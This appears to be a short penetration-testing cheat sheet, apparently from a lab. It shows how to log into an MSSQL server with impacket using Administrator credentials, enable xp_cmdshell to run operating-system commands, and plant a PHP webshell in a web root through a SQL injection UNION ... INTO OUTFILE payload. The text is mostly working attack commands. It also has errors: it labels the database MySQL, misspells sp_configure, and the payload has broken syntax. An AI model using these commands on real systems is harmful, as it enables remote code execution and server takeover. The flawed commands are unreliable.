# add command execution to mysql db
#connect to db
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth;
# enable advanced options
SQL> EXECUTE sp_configure 'show advanced options', 1;
# enable shell
SQL> RECONFIGURE;
SQL> EXECUTE sp configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;
# execute commands
SQL> EXECUTE xp_cmdshell "whoami"
# example payload for sql file inclusion to revshell
UNION SELECT "<?php system($_GET['cmd ']);?>" null, null, null, null INTO OUTFILE
"/var/www/html/tmp/webshell.php" -- //